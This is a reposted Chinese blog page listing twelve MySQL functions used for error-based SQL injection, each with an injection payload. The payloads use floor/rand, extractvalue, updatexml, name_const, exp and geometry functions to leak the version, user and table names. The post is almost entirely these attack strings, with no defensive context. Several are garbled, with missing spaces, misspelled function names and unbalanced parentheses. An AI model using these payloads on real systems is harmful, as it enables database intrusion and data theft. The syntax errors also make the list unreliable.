码迷,mamicode.com
首页 > 数据库 > 详细

SQL报错注入的12个函数及sql注入语句

时间:2018-07-09 12:44:28      阅读:2286      评论:0      收藏:0      [点我收藏+]

标签:ext   rom   bsp   rdb   string   报错   icc   const   table   

转来的 侵删

1、通过floor报错,注入语句如下:   

 

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

 

2、通过ExtractValue报错,注入语句如下:

 

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

 

3、通过UpdateXml报错,注入语句如下:

 

and 1=(updatexml(1,concat(0x3a,(selectuser())),1))

 

4、通过NAME_CONST报错,注入语句如下:

 

and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

 

5、通过join报错,注入语句如下:

 

select * from(select * from mysql.user ajoin mysql.user b)c;

 

6、通过exp报错,注入语句如下:

 

and exp(~(select * from (select user () ) a) );

 

7、通过GeometryCollection()报错,注入语句如下:

 

and GeometryCollection(()select *from(select user () )a)b );

 

8、通过polygon ()报错,注入语句如下:

 

and polygon (()select * from(select user ())a)b );

 

9、通过multipoint ()报错,注入语句如下:

 

and multipoint (()select * from(select user() )a)b );

 

10、通过multlinestring ()报错,注入语句如下:

 

and multlinestring (()select * from(selectuser () )a)b );

 

11、通过multpolygon ()报错,注入语句如下:

 

and multpolygon (()select * from(selectuser () )a)b );

 

12、通过linestring ()报错,注入语句如下:

 

and linestring (()select * from(select user() )a)b );

技术分享图片

 join报错注入

SQL报错注入的12个函数及sql注入语句

标签:ext   rom   bsp   rdb   string   报错   icc   const   table   

原文地址:https://www.cnblogs.com/fengshui/p/9282991.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!